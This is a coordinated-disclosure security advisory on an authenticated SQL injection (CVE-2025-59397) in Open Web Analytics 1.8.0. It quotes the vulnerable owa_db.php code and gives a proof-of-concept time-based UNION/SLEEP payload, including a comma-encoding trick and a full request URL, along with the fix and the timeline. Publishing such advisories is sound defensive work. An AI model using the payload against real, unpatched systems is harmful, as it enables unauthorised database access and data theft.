    Seralys Security Advisory | https://www.seralys.com/research
======================================================================
Title:       SQL Injection Vulnerability
Product:     Open Web Analytics (OWA)
Affected:    Confirmed on 1.8.0 (older versions likely affected)
Fixed in:    1.8.1
Vendor:      Open Web Analytics (open-source)
Discovered:  August 2025
Severity:    HIGH
CWE:         CWE-89: SQL Injection
CVE:         CVE-2025-59397
CVSS:        6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Discovered by: Philippe Caturegli & Mohamed Mahmoudi (Seralys)

======================================================================
Overview
--------

Open Web Analytics (OWA) contains a SQL injection vulnerability in 
its query builder (`owa_db.php`). When handling constraints, the 
parameter `v[value]` is concatenated into SQL statements without 
sanitization. 

The vulnerability exist specifically in the logic for operators `=@` 
and `!@`, where user-supplied input is directly inserted into a SQL 
string. 

An attacker with a low-privileged account can supply crafted input 
that results in execution of arbitrary SQL queries.

======================================================================
Technical Details
-----------------

Affected Source File:
---------------------
owa_db.php (line 597 and line 601)
https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/
release-1.8.0/owa_db.php#L596

Relevant code excerpt:
foreach ($params as $k => $v) {

switch (strtolower($v['operator'])) {
[...]
  case '=@':
    $constraint .= sprintf("LOCATE('%s', %s) > 0",$v['value'], 
	$this->prepare( $v['name'] ) );
    break;

  case '!@':
    $constraint .= sprintf("LOCATE('%s', %s) = 0",$v['value'], 
	$this->prepare( $v['name'] ) );
    break;
[...]
return $constraint;
   }
    }

Notes:
- `v['value']` is taken from user-controlled request parameters.
- `v['value']` is directly embedded inside a single-quoted string.
- Because LOCATE parameters are comma-delimited, commas inside 
  the injected SQL must be preserved (e.g., via `&#44;` encoding) to 
  avoid being split by the parser before the SQL is constructed.
- Exploitation requires a valid account that can trigger queries with 
  `owa_constraints`.  

======================================================================
Proof of Concept
-----------------

Steps: 
1) insert the =@ or !@ operator
2) close the string
3) syntactically complete an early `LOCATE()` call with two arguments. 
(note: to preserve commas through the constraint parser, we can encode 
them as `&#44;`)
4) inject a time-based payload 
5) and comment out the rest of the server-constructed fragment. 

Payload example: 
owa_constraints=siteId=@dummy'&#44;'dummy') UNION SELECT 1&#44;2&#44;
SLEEP(5)-- 

Payload example (url encoded):
owa_constraints=siteId%3d%40dummy%27%26%23%34%34%3b%27dummy%27%29%20
UNION%20SELECT%201%26%23%34%34%3b2%26%23%34%34%3bSLEEP%285%29--%20

Full URL: 
http://owa_site/api/index.php?owa_siteId=owa_period=last_seven_days&
owa_do=reports&owa_module=base&owa_version=v1&owa_metrics=visits,pageViews,
bounceRate&owa_dimensions=date&owa_sort=date&owa_format=json&
owa_constraints=siteId%3D%3D40dummy%27%20UNION%20SELECT%201%2C%31%2C%33%2C
%34%33%2C%31%2C%36%2C%31%34%33bSLEEP%285%29--%20&owa_nonce=<nonce>

======================================================================
Impact
------

- Authenticated SQL injection in OWA queries  
- Database data exfiltration possible  
- Risk of privilege escalation through extracted credentials  

======================================================================
Vendor Response
---------------

The Open Web Analytics project acknowledged the report and implemented 
a fix in commit 1e55315. The issue was resolved in release 1.8.1. 
Users are advised to upgrade to this version to address CVE-2025-59397.

======================================================================
Timeline
--------

- 2025-08-19: Vulnerability discovered
- 2025-08-20: Advisory drafted
- 2025-08-20: Vendor contact initiated
- 2025-08-24: Vendor acknowledged receipt and initiated coordination
- 2025-09-01: Fix committed to github (1e55315)
- 2025-09-07: Release 1.8.1 released with security fix
- 2025-10-08: Coordinated disclosure

======================================================================
About Seralys
-------------

Seralys is a boutique penetration testing firm with offices in Europe 
and North America. We provide high value-add penetration testing and 
security assessments.

https://www.seralys.com

======================================================================
Acknowledgments
---------------

Special shoutout to our fellow researchers at BastardLabs. \m/

======================================================================
Disclaimer
----------

This advisory is provided for coordinated disclosure purposes only.
Reproduction or distribution for malicious use is strictly prohibited.

EOF